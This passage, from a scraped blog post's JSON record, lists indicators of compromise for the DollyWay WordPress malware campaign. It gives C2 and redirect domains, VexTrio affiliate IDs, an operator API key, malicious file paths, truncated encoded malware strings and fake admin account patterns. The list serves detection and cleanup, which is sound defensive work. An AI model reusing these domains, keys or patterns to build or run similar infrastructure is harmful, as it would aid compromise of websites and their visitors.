<\/span><\/span><\/span><\/pre>\n<\/div>\n<p><strong>C2 update URL pattern:\u00a0<\/strong><\/p>\n<div>\n<pre class=\"code_syntax\" style=\"color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\">https<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#d2cd86; \">\/<\/span><span style=\"color:#d2cd86; \">\/<\/span><span style=\"color:#d2cd86; \">compromised<span style=\"color:#d2cd86; \">-<\/span>site<span style=\"color:#d2cd86; \">&gt;<\/span><span style=\"color:#d2cd86; \">\/<\/span>wp<span style=\"color:#d2cd86; \">-<\/span>content<span style=\"color:#d2cd86; \">\/<\/span>data<span style=\"color:#00a800; \">.<\/span>txt <\/span><\/span><\/pre>\n<\/div>\n<p><strong>VexTrio\/LosPollos integration:\u00a0<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li>Affiliate ID before September 2021: u=h2xkd0x\u00a0<\/li>\n<li>Affiliate ID after September 2021: u=7mkpd0d\u00a0<\/li>\n<li>LosPollos API key: ea6ff61a45e946c287ea5f121c4f2e4b\u00a0<\/li>\n<li><span>Domains and LosPollos categories:\u00a0<\/span>\n<ul class=\"wp-block-list\">\n<li>Dating: romancezone[.]one\u00a0<\/li>\n<li>Mainstream: topawardpicks[.]top, yourspacegain[.]top\u00a0<\/li>\n<li>Crypto: coinsboostbonus[.]top\u00a0<\/li>\n<li>Gay Dating: hot-gays-quest[.]life\u00a0<\/li>\n<li>iGaming: your-bigprofit.top\u00a0<\/li>\n<li>Cams: myhot-cams[.]life\u00a0<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><strong>Redirects after November 20, 2024:\u00a0<\/strong><\/p>\n<p>Pattern:\u00a0\u00a0<\/p>\n<div>\n<pre class=\"code_syntax\" style=\"white-space:pre-wrap;color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\">hxxps<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#d2cd86; \">\/<\/span><span style=\"color:#d2cd86; \">\/<\/span><span style=\"color:#d2cd86; \">subdomain<span style=\"color:#d2cd86; \">&gt;<\/span><span style=\"color:#d2cd86; \">.<\/span><span style=\"color:#d2cd86; \">apex<span style=\"color:#d2cd86; \">-<\/span>domain<span style=\"color:#d2cd86; \">&gt;<\/span><span style=\"color:#d2cd86; \">\/<\/span>help<span style=\"color:#d2cd86; \">\/<\/span>?<span style=\"color:#00a800; \">11341608982415<\/span><span style=\"color:#d2cd86; \">&amp;<\/span>sub_id_1<span style=\"color:#d2cd86; \">=<\/span><span style=\"color:#d2cd86; \">encripted<span style=\"color:#d2cd86; \">-<\/span>compromised<span style=\"color:#d2cd86; \">-<\/span>domain<span style=\"color:#d2cd86; \">&gt;<\/span>\u00a0<\/span><\/span><\/span><\/span><\/pre>\n<\/div>\n<p>Example:\u00a0\u00a0<\/p>\n<div>\n<pre class=\"code_syntax\" style=\"color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\">hxxps<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#d2cd86; \">\/<\/span><span style=\"color:#d2cd86; \">\/<\/span>dalopt<span style=\"color:#00a800; \">.<\/span>participates<span style=\"color:#d2cd86; \">[<\/span><span style=\"color:#d2cd86; \">.<\/span><span style=\"color:#d2cd86; \">]<\/span>cfd<span style=\"color:#d2cd86; \">\/<\/span>help<span style=\"color:#d2cd86; \">\/<\/span>?<span style=\"color:#00a800; \">11341608982415<\/span><span style=\"color:#d2cd86; \">&amp;<\/span>sub_id_1<span style=\"color:#d2cd86; \">=<\/span><span style=\"color:#d2cd86; \">[<\/span>redacted<span style=\"color:#d2cd86; \">]<\/span>\u00a0<\/span><\/pre>\n<\/div>\n<p>Redirect domains:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>abstracts.cngsby[.]cfd\u00a0<\/li>\n<li>ity.anoneth[.]fun\u00a0<\/li>\n<li>admirable.brehmed[.]cfd\u00a0<\/li>\n<li>adventure.lantial[.]cfd\u00a0<\/li>\n<li>alignment.econd[.]cfd\u00a0<\/li>\n<li>artistry.cngsby[.]sbs\u00a0<\/li>\n<li>barometer.unroose[.]space\u00a0<\/li>\n<li>breakfast.ffiftringg[.]sbs\u00a0<\/li>\n<li>composure.pedancy[.]fun\u00a0<\/li>\n<li>configure.crellar[.]cfd\u00a0<\/li>\n<li>constructive.curvive[.]space\u00a0<\/li>\n<li>constructive.lantial[.]us\u00a0<\/li>\n<li>dalopt.participates[.]cfd\u00a0<\/li>\n<li>discovered.secamondareeng[.]space\u00a0<\/li>\n<li>expedient.eithert[.]cfd\u00a0<\/li>\n<li>framework.chellor[.]cfd\u00a0<\/li>\n<li>framework.reorget[.]cfd\u00a0<\/li>\n<li>framework.retiont[.]space\u00a0<\/li>\n<li>landscape.chanism[.]sbs\u00a0<\/li>\n<li>landscape.goalked[.]cfd\u00a0<\/li>\n<li>landslide.postume[.]cfd\u00a0<\/li>\n<li>mainframe.crellar[.]sbs\u00a0<\/li>\n<li>methodical.reorgedt[.]fun\u00a0<\/li>\n<li>momentous.debayon[.]sbs\u00a0<\/li>\n<li>overload.threath[.]sbs\u00a0<\/li>\n<li>procedure.secreeng[.]space\u00a0<\/li>\n<li>resonance.agained[.]cfd\u00a0<\/li>\n<li>streaming.threath[.]cfd\u00a0<\/li>\n<li>tavux.participates[.]cfd\u00a0<\/li>\n<li>transmit.chanism[.]cfd\u00a0<\/li>\n<li>tremendous.mcgonal[.]cfd\u00a0<\/li>\n<li>vintage.brehmed[.]sbs\u00a0<\/li>\n<li>workbench.cudwork[.]cfd\u00a0<\/li>\n<li>oldoak.spindexed[.]site <\/li>\n<li>keenram.anariding[.]site <\/li>\n<li>premiumservices.approviding[.]store<\/li>\n<\/ul>\n<h3 id=\"h-server-side-iocs-nbsp\">Server-side IoCs:\u00a0<\/h3>\n<p><strong>Files used in C2\/TDS nodes:\u00a0<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li>wp-content\/counts.php\u00a0<\/li>\n<li>wp-content\/count.php\u00a0<\/li>\n<li>wp-content\/data.txt\u00a0<\/li>\n<li>wp-content\/4052e211471469076d33effdf1795b24 \/\/ md5(&#8216;11341608982415&#8217;)\u00a0<\/li>\n<\/ul>\n<p><strong>WPCode snippets:\u00a0<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><span>Table: wp_posts\u00a0<\/span>\n<ul class=\"wp-block-list\">\n<li>&#8216;wpcode&#8217;\u00a0<\/li>\n<li>post_date=&#8221;2024-07-26 09:19:38&#8243;<\/li>\n<\/ul>\n<\/li>\n<li><span>Table: wp_options\u00a0<\/span>\n<ul class=\"wp-block-list\">\n<li>option_name=\u2019wpcode_snippets\u2019\u00a0<\/li>\n<li>$wpcode_option[\u2018everywhere\u2019][0][\u2018modified\u2019] = \u20182024-08-05 10:55:28\u2019<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><strong>Encrypted DollyWay code in wp_options table (earlier modifications)\u00a0<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li>CgppZighZGVmaW5lZCgnRE9MTFlfV0FZJykpeyBkZWZpbmUoJ0RPTExZX1dBWScsICdXb3JsZCBEb21pbmF0aW9uJyk7fQoK\u2026\u00a0<\/li>\n<\/ul>\n<p><strong>Strings found in malware (active plugins and WPCode snippets):\u00a0<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li>unserialize(base64_decode(&#8216;YToxMDM6e2k6MDtzOjY6ImFocmVmcyI7aToxO3M6ODoiYXN0ZXJpYXMiO2k6MjtzOjE\u00a0<\/li>\n<\/ul>\n<ul class=\"wp-block-list\">\n<li>unserialize(base64_decode(&#8216;YToxMzp7czoxMToiUGx1Z2luIE5hbWUiO3M6MTE6IlBsdWdpbiBOYW1lIjtzO\u00a0<\/li>\n<\/ul>\n<p><strong>Temporary file names:\u00a0<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li><temp-dir>\/base64_decode<random-string>\u00a0<\/random-string><\/temp-dir><\/li>\n<li><temp-dir>\/plugins<random-string>\u00a0<\/random-string><\/temp-dir><\/li>\n<li><temp-dir>\/sys_get_temp_dir<random-string>\u00a0<\/random-string><\/temp-dir><\/li>\n<\/ul>\n<p><strong>Malicious admin accounts:\u00a0<\/strong><\/p>\n<ul class=\"wp-block-list\">\n<li>Usernames: Random hexadecimal strings (up to 32 characters)\u00a0<\/li>\n<li>Email pattern: <same-as-username>@[random-hex].com\u00a0<\/same-as-username><\/li>\n<\/ul>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Username<\/strong>\u00a0<\/td>\n<td><strong>Email<\/strong>\u00a0<\/td>\n<\/tr>\n<tr>\n<td>7591c62c3c443a75fbdf9fadfbe2802f\u00a0<\/td>\n<td>7591c62c3c443a75fbdf9fadfbe2802f@113c971f77f8.com\u00a0<\/td>\n<\/tr>\n<tr>\n<td>36e21a1c8c\u00a0<\/td>\n<td>36e21a1c8c@d5b53904ee84dac8d41331f0b.com\u00a0<\/td>\n<\/tr>\n<tr>\n<td>6fcb1f44c9b1772a0\u00a0<\/td>\n<td>6fcb1f44c9b1772a0@1a8001dc2c3607.com\u00a0<\/td>\n<\/tr>\n<tr>\n<td>3cc40c79f2d7217139a8\u00a0<\/td>\n<td>3cc40c79f2d7217139a8@27d831561ab46a5244a82.com\u00a0<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Public Key:\u00a0<\/strong><\/p>\n<div>\n<pre class=\"code_syntax\" style=\"color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\"><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#e66170; font-weight:bold; \">BEGIN<\/span> <span style=\"color:#e66170; font-weight:bold; \">PUBLIC<\/span> KEY<span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span>\u00a0<\/span>\n<span class=\"line_wrapper\">MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKLN9azzu<span style=\"color:#d2cd86; \">\/<\/span>i<span style=\"color:#d2cd86; \">\/<\/span>HYvYc<span style=\"color:#d2cd86; \">+<\/span>0CW5DViGIuCJbz\u00a0<\/span>\n<span class=\"line_wrapper\">23skWsSTwkO6wSga7QJU<span style=\"color:#d2cd86; \">+<\/span>m0elAll3iGTFOSFzXChhlluOrW6<span style=\"color:#d2cd86; \">+<\/span>VVLXb8CAwEAAQ<span style=\"color:#d2cd86; \">=<\/span><span style=\"color:#d2cd86; \">=<\/span>\u00a0<\/span>\n<span class=\"line_wrapper\"><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#e66170; font-weight:bold; \">END<\/span> <span style=\"color:#e66170; font-weight:bold; \">PUBLIC<\/span> KEY<span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><span style=\"color:#d2cd86; \">-<\/span><\/span><\/pre>\n<\/div>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>Key findings\u00a0 GoDaddy Security researchers have uncovered a long-running malware operation dating back to 2016 that has compromised over 20,000 websites globally in the past 8 years. Campaign infrastructure currently leverages a distributed network of compromised WordPress sites as TDS and Command and Control (C2) nodes.\u00a0 The latest campaign (DollyWay) demonstrates sophisticated capabilities including cryptographically [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":140370,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[95],"tags":[59739,22198,2764,41330,12827,1003],"dealstore":[],"offerexpiration":[],"class_list":["post-140369","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internet-business","tag-infosec","tag-malware","tag-security","tag-sophisticated","tag-website","tag-years"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>8 Years of Sophisticated Website Malware - Som2ny Network<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/fivemor.com\/?p=140369\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"8 Years of Sophisticated Website Malware - Som2ny Network\" \/>\n<meta property=\"og:description\" content=\"Key findings\u00a0 GoDaddy Security researchers have uncovered a long-running malware operation dating back to 2016 that has compromised over 20,000 websites globally in the past 8 years. Campaign infrastructure currently leverages a distributed network of compromised WordPress sites as TDS and Command and Control (C2) nodes.\u00a0 The latest campaign (DollyWay) demonstrates sophisticated capabilities including cryptographically [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/fivemor.com\/?p=140369\" \/>\n<meta property=\"og:site_name\" content=\"Som2ny Network\" \/>\n<meta property=\"article:published_time\" content=\"2025-03-17T20:45:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1536\" \/>\n\t<meta property=\"og:image:height\" content=\"1184\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"25 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/fivemor.com\/?p=140369#article\",\"isPartOf\":{\"@id\":\"https:\/\/fivemor.com\/?p=140369\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/fivemor.com\/#\/schema\/person\/b85e3c3dc0e1daea076524dc8810c371\"},\"headline\":\"8 Years of Sophisticated Website Malware\",\"datePublished\":\"2025-03-17T20:45:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/fivemor.com\/?p=140369\"},\"wordCount\":4808,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/fivemor.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/fivemor.com\/?p=140369#primaryimage\"},\"thumbnailUrl\":\"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg\",\"keywords\":[\"InfoSec\",\"Malware\",\"Security\",\"sophisticated\",\"Website\",\"Years\"],\"articleSection\":[\"Internet Business\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/fivemor.com\/?p=140369#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/fivemor.com\/?p=140369\",\"url\":\"https:\/\/fivemor.com\/?p=140369\",\"name\":\"8 Years of Sophisticated Website Malware - Som2ny Network\",\"isPartOf\":{\"@id\":\"https:\/\/fivemor.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/fivemor.com\/?p=140369#primaryimage\"},\"image\":{\"@id\":\"https:\/\/fivemor.com\/?p=140369#primaryimage\"},\"thumbnailUrl\":\"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg\",\"datePublished\":\"2025-03-17T20:45:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/fivemor.com\/?p=140369#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/fivemor.com\/?p=140369\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/fivemor.com\/?p=140369#primaryimage\",\"url\":\"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg\",\"contentUrl\":\"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg\",\"width\":1536,\"height\":1184},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/fivemor.com\/?p=140369#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/fivemor.com\/?bp_activities=1\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"8 Years of Sophisticated Website Malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/fivemor.com\/#website\",\"url\":\"https:\/\/fivemor.com\/\",\"name\":\"Som2ny Network\",\"description\":\"Daily Deals\",\"publisher\":{\"@id\":\"https:\/\/fivemor.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/fivemor.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/fivemor.com\/#organization\",\"name\":\"Som2ny Network\",\"url\":\"https:\/\/fivemor.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/fivemor.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/fivemor.com\/wp-content\/uploads\/2026\/07\/4a0953c4-logo-300x86-1.png\",\"contentUrl\":\"https:\/\/fivemor.com\/wp-content\/uploads\/2026\/07\/4a0953c4-logo-300x86-1.png\",\"width\":300,\"height\":86,\"caption\":\"Som2ny Network\"},\"image\":{\"@id\":\"https:\/\/fivemor.com\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/fivemor.com\/#\/schema\/person\/b85e3c3dc0e1daea076524dc8810c371\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/fivemor.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/729ae85bf62b9917e93538db2f2688ca?s=96&r=g&default=https%3A%2F%2Ffivemor.com%2Fwp-content%2Fplugins%2Fbuddypress-first-letter-avatar%2Fimages%2Fdefault%2F96%2Flatin_a.png\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/729ae85bf62b9917e93538db2f2688ca?s=96&r=g&default=https%3A%2F%2Ffivemor.com%2Fwp-content%2Fplugins%2Fbuddypress-first-letter-avatar%2Fimages%2Fdefault%2F96%2Flatin_a.png\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/fivemor.com\"],\"url\":\"https:\/\/fivemor.com\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"8 Years of Sophisticated Website Malware - Som2ny Network","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/fivemor.com\/?p=140369","og_locale":"en_US","og_type":"article","og_title":"8 Years of Sophisticated Website Malware - Som2ny Network","og_description":"Key findings\u00a0 GoDaddy Security researchers have uncovered a long-running malware operation dating back to 2016 that has compromised over 20,000 websites globally in the past 8 years. Campaign infrastructure currently leverages a distributed network of compromised WordPress sites as TDS and Command and Control (C2) nodes.\u00a0 The latest campaign (DollyWay) demonstrates sophisticated capabilities including cryptographically [&hellip;]","og_url":"https:\/\/fivemor.com\/?p=140369","og_site_name":"Som2ny Network","article_published_time":"2025-03-17T20:45:33+00:00","og_image":[{"width":1536,"height":1184,"url":"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"25 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/fivemor.com\/?p=140369#article","isPartOf":{"@id":"https:\/\/fivemor.com\/?p=140369"},"author":{"name":"admin","@id":"https:\/\/fivemor.com\/#\/schema\/person\/b85e3c3dc0e1daea076524dc8810c371"},"headline":"8 Years of Sophisticated Website Malware","datePublished":"2025-03-17T20:45:33+00:00","mainEntityOfPage":{"@id":"https:\/\/fivemor.com\/?p=140369"},"wordCount":4808,"commentCount":0,"publisher":{"@id":"https:\/\/fivemor.com\/#organization"},"image":{"@id":"https:\/\/fivemor.com\/?p=140369#primaryimage"},"thumbnailUrl":"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg","keywords":["InfoSec","Malware","Security","sophisticated","Website","Years"],"articleSection":["Internet Business"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/fivemor.com\/?p=140369#respond"]}]},{"@type":"WebPage","@id":"https:\/\/fivemor.com\/?p=140369","url":"https:\/\/fivemor.com\/?p=140369","name":"8 Years of Sophisticated Website Malware - Som2ny Network","isPartOf":{"@id":"https:\/\/fivemor.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/fivemor.com\/?p=140369#primaryimage"},"image":{"@id":"https:\/\/fivemor.com\/?p=140369#primaryimage"},"thumbnailUrl":"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg","datePublished":"2025-03-17T20:45:33+00:00","breadcrumb":{"@id":"https:\/\/fivemor.com\/?p=140369#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/fivemor.com\/?p=140369"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fivemor.com\/?p=140369#primaryimage","url":"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg","contentUrl":"https:\/\/fivemor.com\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-110632.jpg","width":1536,"height":1184},{"@type":"BreadcrumbList","@id":"https:\/\/fivemor.com\/?p=140369#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/fivemor.com\/?bp_activities=1"},{"@type":"ListItem","position":2,"name":"8 Years of Sophisticated Website Malware"}]},{"@type":"WebSite","@id":"https:\/\/fivemor.com\/#website","url":"https:\/\/fivemor.com\/","name":"Som2ny Network","description":"Daily Deals","publisher":{"@id":"https:\/\/fivemor.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/fivemor.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/fivemor.com\/#organization","name":"Som2ny Network","url":"https:\/\/fivemor.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fivemor.com\/#\/schema\/logo\/image\/","url":"https:\/\/fivemor.com\/wp-content\/uploads\/2026\/07\/4a0953c4-logo-300x86-1.png","contentUrl":"https:\/\/fivemor.com\/wp-content\/uploads\/2026\/07\/4a0953c4-logo-300x86-1.png","width":300,"height":86,"caption":"Som2ny Network"},"image":{"@id":"https:\/\/fivemor.com\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/fivemor.com\/#\/schema\/person\/b85e3c3dc0e1daea076524dc8810c371","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fivemor.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/729ae85bf62b9917e93538db2f2688ca?s=96&r=g&default=https%3A%2F%2Ffivemor.com%2Fwp-content%2Fplugins%2Fbuddypress-first-letter-avatar%2Fimages%2Fdefault%2F96%2Flatin_a.png","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/729ae85bf62b9917e93538db2f2688ca?s=96&r=g&default=https%3A%2F%2Ffivemor.com%2Fwp-content%2Fplugins%2Fbuddypress-first-letter-avatar%2Fimages%2Fdefault%2F96%2Flatin_a.png","caption":"admin"},"sameAs":["https:\/\/fivemor.com"],"url":"https:\/\/fivemor.com\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/fivemor.com\/index.php?rest_route=\/wp\/v2\/posts\/140369","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fivemor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fivemor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fivemor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fivemor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=140369"}],"version-history":[{"count":0,"href":"https:\/\/fivemor.com\/index.php?rest_route=\/wp\/v2\/posts\/140369\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fivemor.com\/index.php?rest_route=\/wp\/v2\/media\/140370"}],"wp:attachment":[{"href":"https:\/\/fivemor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=140369"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fivemor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=140369"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fivemor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=140369"},{"taxonomy":"dealstore","embeddable":true,"href":"https:\/\/fivemor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fdealstore&post=140369"},{"taxonomy":"offerexpiration","embeddable":true,"href":"https:\/\/fivemor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fofferexpiration&post=140369"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}